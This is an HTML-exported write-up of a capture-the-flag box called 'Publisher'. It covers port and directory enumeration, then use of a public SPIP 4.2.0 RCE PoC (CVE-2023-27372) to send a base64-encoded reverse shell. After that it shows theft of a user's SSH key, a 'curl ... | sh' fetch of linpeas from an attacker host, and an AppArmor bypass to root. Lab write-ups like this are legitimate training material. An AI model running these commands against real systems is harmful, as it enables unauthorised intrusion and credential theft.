<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Publisher</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta keywords="in progress">
<style>

.CodeMirror {
  height: inherit;
}

.doc-embed {
  padding: 0;
  border: 1px solid #41454E;
  border-radius: 3px;
  margin-bottom: 4px;

  color: #fff;

  .doc-embed-wrapper {
    display: flex;
    align-items: stretch;
    flex-wrap: nowrap;
  }

  .collapse-trigger {
    flex: 0 0 auto;
    display: flex;
    flex-direction: column;
    padding-top: 4px;
    padding-left: 4px;
    cursor: pointer;
    overflow: hidden;

    .threadline {
      flex: 1 1 auto;
      width: 1px;
      background: #3a3d42;
      transition: 0.2s
      display: block;
      margin: auto;
    }

    &:hover .threadline {
      width: 1px;
      background: #E6E6E6
    }
  }

  svg {
    width: 40px;
    height: 40px;
    cursor: pointer;
    fill: currentColor;
  }

  &.collapsed {
    .collapse-trigger  {
      .threadline {
        display: none;
      }
      svg {
        transform: rotate(-90deg);
      }
    }
    .doc-embed-content {
      display: none;
    }
  }

  .embed-body {
    min-width: 0;
  }

  .doc-embed-header {
    display: flex;
    align-items: center;

    & > div {
      flex: 1;
      min-width: 0;
      padding: 4px 8px 4px 4px;
    }

    h1, a {
      white-space: nowrap;
      overflow: hidden;
      text-overflow: ellipsis;
    }

    h1 {
      font-size: 24px;
      margin: 0;
    }

    p {
      margin: 0;
    }

    a {
      display: block;
    }

    a > svg {
      margin-right: 5px;
      width: 20px;
      height: 20px;
      vertical-align: middle;
    }
  }

  .doc-embed-content {
    padding: 0 8px;
  }
}

-ms-text-size-adjust: 100%;
-webkit-text-size-adjust: 100%;
line-height: 1.6;
font-family: Lato, -apple-system, BlinkMacSystemFont, Helvetica, Arial, sans-serif;
font-size: 15px;
line-height: 1.6;
word-wrap: break-word;

.dark, .solarizedDark {
  color: #FFF;
}

details {
  display: block;
}

summary {
  display: list-item;
}

a {
  background-color: transparent;
}

a:active,
  a:hover {
  outline-width: 0;
}

strong {
  font-weight: inherit;
  font-weight: bolder;
}

h1 {
  font-size: 2em;
  margin: 0.67em 0;
}

img {
  border-style: none;
}

code,
  kbd,
  pre {
  font-family: monospace, monospace;
  font-size: 1em;
}

hr {
  box-sizing: content-box;
  height: 0;
  overflow: visible;
}

input {
  font: inherit;
  margin: 0;
}

input {
  overflow: visible;
}

[type='checkbox'] {
  box-sizing: border-box;
  padding: 0;
}

* {
  box-sizing: border-box;
}

input {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}

a {
  color: #0366d6;
  text-decoration: none;
}

a:hover {
  text-decoration: underline;
}

strong {
  font-weight: 600;
}

hr {
  background: transparent;
  border: 0;
  border-bottom: 1px solid #dfe2e5;
  height: 0;
  margin: 15px 0;
  overflow: hidden;
}

hr:before {
  content: '';
  display: table;
}

hr:after {
  clear: both;
  content: '';
  display: table;
}

table {
  border-collapse: collapse;
  border-spacing: 0;
}

td,
  th {
  padding: 0;
}

details summary {
  cursor: pointer;
}

h1,
  h2,
  h3,
  h4,
  h5,
  h6 {
  margin-bottom: 0;
  margin-top: 0;
}

h1 {
  font-size: 32px;
}

h1,
  h2 {
  font-weight: 500;
}

h2 {
  font-size: 24px;
}

h3 {
  font-size: 20px;
}

h3,
  h4 {
  font-weight: 500;
}

h4 {
  font-size: 16px;
}

h5 {
  font-size: 14px;
}

h5,
  h6 {
  font-weight: 600;
}

h6 {
  font-size: 12px;
}

p {
  margin-bottom: 10px;
  margin-top: 0;
}

blockquote {
  margin: 0;
}

ol,
  ul {
  margin-bottom: 0;
  margin-top: 0;
  padding-left: 0;
}

ol ol,
  ul ol {
  list-style-type: lower-roman;
}

ol ol ol,
  ol ul ol,
  ul ol ol,
  ul ul ol {
  list-style-type: lower-alpha;
}

dd {
  margin-left: 0;
}

code,
  pre {
  font-family: SFMono-Regular, Consolas, Liberation Mono, Menlo, Courier,
    monospace;
  font-size: 12px;
}

pre.CodeMirror,
  code.CodeMirror {
  height: auto;
}

pre {
  margin-bottom: 0;
  margin-top: 0;
}

input::-webkit-inner-spin-button,
input::-webkit-outer-spin-button {
  -webkit-appearance: none;
  appearance: none;
  margin: 0;
}

&:before {
  content: '';
  display: table;
}

&:after {
  clear: both;
  content: '';
  display: table;
}

> :first-child {
  margin-top: 0 !important;
}

> :last-child {
  margin-bottom: 0 !important;
}

a:not([href]) {
  color: inherit;
  text-decoration: none;
}

blockquote,
  dl,
  ol,
  p,
  pre,
  table,
  ul {
  margin-bottom: 16px;
  margin-top: 0;
}

hr {
  background-color: #e1e4e8;
  border: 0;
  height: 1px;
  margin: 16px 0;
  padding: 0;
}

blockquote {
  border-left: 0.25em solid #e1e4e8;
  color: #999999;
  padding: 0 1em;
}

blockquote > :first-child {
  margin-top: 0;
}

blockquote > :last-child {
  margin-bottom: 0;
}

kbd {
  background-color: #fafbfc;
  border: 1px solid #c6cbd1;
  border-bottom-color: #959da5;
  border-radius: 3px;
  box-shadow: inset 0 -1px 0 #959da5;
  color: #444d56;
  display: inline-block;
  font-size: 11px;
  line-height: 10px;
  padding: 3px 5px;
  vertical-align: middle;
}

h1,
  h2,
  h3,
  h4,
  h5,
  h6 {
  line-height: 1.25;
  margin: 8px 0;
}

h1 {
  margin-top: 32px;
  font-weight: 600;
  font-size: 1.953em;
  margin-bottom: 10px;
}

h2 {
  font-weight: 600;
  font-size: 1.5em;
  margin-top: 16px;
  margin-bottom: 8px;
}

h3 {
  font-weight: 600;
  font-size: 1.25em;
}

h4 {
  font-weight: 400;
  font-size: 1em;
}

h5 {
  font-weight: 400;
  font-size: 0.875em;
}

h6 {
  font-weight: 400;
  color: #6a737d;
  font-size: 0.85em;
}

ol,
  ul {
  padding-left: 2em;
}
ol ol,
  ol ul,
  ul ol,
  ul ul {
  margin-bottom: 0;
  margin-top: 0;
}

li {
  word-wrap: break-all;
}

li > p {
  margin-top: 16px;

&:first-child {
    margin-top: 0;
  }
&:last-child {
    margin-bottom: 0;
  }
}

li + li {
  margin-top: 0.25em;
}

dl {
  padding: 0;
}

dl dt {
  font-size: 1em;
  font-style: italic;
  font-weight: 600;
  margin-top: 16px;
  padding: 0;
}

dl dd {
  margin-bottom: 16px;
  padding: 0 16px;
}

table {
  display: block;
  overflow: auto;
  width: 100%;
}

table th {
  font-weight: 600;
}

table td,
  table th {
  border: 1px solid #dfe2e5;
  padding: 6px 13px;
}

table tr {
  border-top: 1px solid #c6cbd1;
}

img {
  display: block;
  max-width: 100%;
  height: auto;
  margin: 15px 0;
  box-sizing: content-box;
}

img[align='right'] {
  padding-left: 20px;
}

img[align='left'] {
  padding-right: 20px;
}

code {
  background-color: rgba(27, 31, 35, 0.05);
  border-radius: 3px;
  font-size: 85%;
  margin: 0;
  padding: 0.2em 0.4em;
}

p code,
  li code
{
  padding: 2px;
  border-width: 1px;
  border-style: solid;
  border-radius: 5px;
}

pre {
  word-wrap: normal;
}

pre > code {
  background: transparent;
  border: 0;
  font-size: 100%;
  margin: 0;
  padding: 0;
  white-space: pre;
  word-break: normal;
}

.highlight {
  margin-bottom: 16px;
}

.highlight pre {
  margin-bottom: 0;
  word-break: normal;
}

.highlight pre,
  pre {
  background-color: #f6f8fa;
  border-radius: 3px;
  font-size: 85%;
  line-height: 1.45;
  overflow: auto;
  padding: 16px;
}

pre code {
  background-color: transparent;
  border: 0;
  display: inline;
  line-height: inherit;
  margin: 0;
  max-width: auto;
  overflow: visible;
  padding: 0;
  word-wrap: normal;
}

kbd {
  background-color: #fafbfc;
  border: 1px solid #d1d5da;
  border-bottom-color: #c6cbd1;
  border-radius: 3px;
  box-shadow: inset 0 -1px 0 #c6cbd1;
  color: #444d56;
  display: inline-block;
  font: 11px SFMono-Regular, Consolas, Liberation Mono, Menlo, Courier,
    monospace;
  line-height: 10px;
  padding: 3px 5px;
  vertical-align: middle;
}

:checked + .radio-label {
  border-color: #0366d6;
  position: relative;
  z-index: 1;
}

.task-list-item {
  position: relative;
  list-style-type: none;
  height: fit-content;
  min-height: 25px;
}

.task-list-item + .task-list-item {
  margin-top: 3px;
}

.task-list-item input {
  margin: 0 0.2em 0.25em -1.6em;
  vertical-align: middle;
}

.task-list-item input[type=checkbox] {
  position: absolute;
  top: 6px;
}

hr {
  border-bottom-color: #eee;
}

.dark p code,
.dark li code
{
  background-color: rgba(255,255,255,0.12);
  border-color: rgba(255,255,255,0.3);
  color: #5580DC;
}

.auto p code,
.auto li code
{
  background-color: #F9F9F9;
  border-color: rgba(0,0,0,0.26);
  color: #5580DC;
}

.light p code,
.light li code
{
  background-color: #F9F9F9;
  border-color: rgba(0,0,0,0.26);
  color: #5580DC;
}

.sepia p code,
.sepia li code
{
  background-color: #efe8d6;
  border-color: rgba(0,0,0,0.26);
  color: #F77942;
}

.solarizedDark p code,
.solarizedDark li code
{
  background-color: rgba(255,255,255,0.12);
  border-color: rgba(255,255,255,0.3);
  color: #36abe3;
}
</style>
<link rel="stylesheet" href="https://boostnote.io/app/codemirror/theme/codemirror.css">
<link rel="stylesheet" href="https://boostnote.io/app/katex/katex.min.css">
<link rel="stylesheet" href="https://boostnote.io/app/remark-admonitions/classic.css">
<link rel="stylesheet" href="https://boostnote.io/app/codemirror/theme/material-darker.css">
</head>
<body>
<p>Initial Comments</p>
<p>Initial information gathering was done with Nmap, to obtain open ports.
 nmap -sC -sV -oN open_ports.txt [Publisher IP]</p>
<p><img src="https://boostnote.io/api/teams/Fvj_UjaqP/files/45281c6bcf10e66d713f39f427074ee47cd0b9b16c065a3f37062055a1da4073-image.png" alt="image.png"></p>
<p>The web server was nothing of interest alone.
<img src="https://boostnote.io/api/teams/Fvj_UjaqP/files/ef537af384b17c27a96dfed4da9212322d2d6de471c3365d6c98d4fb470ab0ec-image.png" alt="image.png"></p>
<p>To get all the accessible sub-directories for this  gobuster was utilized.</p>
<p>gobuster dir -u [Publisher IP] -w/usr/share/wordlists/dirbuster/directory-list-2.3.small.txt</p>
<p><img src="https://boostnote.io/api/teams/Fvj_UjaqP/files/30ad187737032305c8a23a16221ddfab3fa350642f667a381792fc76170e5484-image.png" alt="image.png"></p>
<p>Enumerating another directory level for "/spip" reveals the following:</p>
<p><img src="https://boostnote.io/api/teams/Fvj_UjaqP/files/50a1127d1fe039cd6df1342057e3ef01e312cf6668d7a55cac3cd052552eca04-image.png" alt="image.png"></p>
<p>Found a login page on the '../spip/ecrire' sub-directory. In addition to this, we know that the CMS in use is SPIP, viewing the page source we find the version of SPIP being used: </p>
<p><img src="https://boostnote.io/api/teams/Fvj_UjaqP/files/1dea7a905b0e4e560142dffc79d991ec4bce510208caefe1d5caa9e32a2c210d-image.png" alt="image.png"></p>
<p>A google search shows SPIP 4.2.0 has a RCE vulnerability, with a POC vulnerability and python command found on GitHub, <a href="https://github.com/nuts7/CVE-2023-27372">https://github.com/nuts7/CVE-2023-27372</a>.</p>
<p>There was some necessary hand-work involved to get this running. It was found that encoding a reverse shell and then sending it as the command to run worked best and allowed access as 'www-data'.</p>
<p>python3 CVE-2023-27372.py -u [Publisher IP]\spip\ecrire -c 'echo [base64 code]|base64 -d|bash'</p>
<p><img src="https://boostnote.io/api/teams/Fvj_UjaqP/files/fa4749346cfd40d63edf821a4a8ab9a92271e927a34e0664e1fd21e98df90639-image.png" alt="image.png"></p>
<p>Shifted directly to the '/home' directory to find the "think" user. The permissions for this directory were loose, which allowed the copy &#x26; paste of the 'id_rsa' key within this users directory.</p>
<p><img src="https://boostnote.io/api/teams/Fvj_UjaqP/files/0e1058e6469c2ac9b8c3b9ff3350072bfd136b8ab1d470ffb417591952688fd8-image.png" alt="image.png"></p>
<p>Saving the 'id_rsa' key to the attacking machine as 'think_id', changing the permissions to ensure SSH allows the use of this key, and then passing the key to sign in as "think" via SSH. </p>
<p><img src="https://boostnote.io/api/teams/Fvj_UjaqP/files/cb9c9d337d8a0016e34b7c70628d37a76be087fb55f611a85f30ee76b9dcfb65-image.png" alt="image.png"></p>
<p>Now that access as the "think" user is made, the user.txt flag can be retrieved.</p>
<p><img src="https://boostnote.io/api/teams/Fvj_UjaqP/files/314f2ba6ed8db3d5d47a9e259632c271e778b4ab22f6c49787a95156ea0baa27-image.png" alt="image.png">This is a snippet as to not spoil the entire flag</p>
<p>With access as "think", 'linpeas' was loaded to the Publisher machine to further enumerate for privilege escalation. With the previous access as 'www-data' commands like:  wget, curl, ftp, etc., were not available. Now that there is an authenticated shell these commands assist in pushing files to and from the attacker machine. </p>
<p> curl http://[attacker-ip]:[port]/linpeas.sh|sh</p>
<p><img src="https://boostnote.io/api/teams/Fvj_UjaqP/files/7fa0f58120268efafd38efdf4d627fe8ed7512fca213e426c3d748d350b08680-image.png" alt="image.png"></p>
<p>The enumeration from 'linpeas' shows a odd SUID set for "/usr/sbin/run_container". Which after attempting to run will start, restart, stop, or create a container. </p>
<p>Understanding that AppArmor is keeping guard to thwart changes to the 'run_container' file that will subsequently deliver the root flag. Some research unearthed a few articles that delivered good knowledge and ideas for obtaining the next steps.</p>
<p><a href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/apparmor">https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/apparmor</a>
<a href="https://stevenjohnstone.net/posts/apparmor-bypass/">https://stevenjohnstone.net/posts/apparmor-bypass/</a></p>
<p>With countless avenues of information on 'AppArmor', the privilege escalation was relatively easy. We can view the blocks in current shell maintained with "think" user.</p>
<p><img src="https://boostnote.io/api/teams/Fvj_UjaqP/files/87e4bbade11b320a365a09d5f746328429303d22c30f86ec3e96ebb5d258d4f0-image.png" alt="image.png"></p>
<p>With this information it is obvious there is path to escalation in two directories due to improper handling of the config for "usr.sbin.ash" : </p>
<p>Heading into /dev/shm and utilizing the information out of GTFObins and enumeration from 'linpeas' it should be possible to simply copy over "/bin/bash" and then execute.</p>
<p><img src="https://boostnote.io/api/teams/Fvj_UjaqP/files/945fc39929bde8dc5dc993899800000297ca4866a884044ac5a4398e6346ad2e-image.png" alt="image.png"></p>
<p>Now it should be possible to edit this file 'run_container.sh'. Utilizing vi a change was made to print the 'root.txt' file. Once saved and ran the root flag is revealed.</p>
<p><img src="https://boostnote.io/api/teams/Fvj_UjaqP/files/ee1ae98148e90ec7273d02e2dee6415f07f39ea59462af5da8c2a9e2516de5a5-image.png" alt="image.png"></p>
<p>This wouldn't be proper privilege escalation if the 'root' user went untouched. Now that commands can be ran from the run_container there are a number of ways that 'root' can be accessed. </p>
<p>-shell into root from 'run_container'
-cat out the 'id_rsa' for 'root' user. </p>
<ul>
<li>create a new user with root level permissions. </li>
<li>etc.</li>
</ul>
<p>Here is shell as root, as to close out privilege escalation:</p>
<p><img src="https://boostnote.io/api/teams/Fvj_UjaqP/files/669115eeb0fc6b091a8bec78081e35924f480a253f4c2b3f3cfb430868d56331-image.png" alt="image.png"></p>
<script>function Ab(e,t){let n=window.document.getElementById(e);if(null==n){n=window.document.createElement(t),n.id=e,n.style.display="none",window.document.body.appendChild(n)}}
        appendElementToBody('chart-export-container', 'canvas')
        appendElementToBody('flowchart-export-container', 'div')
      </script>
</body>
</html>
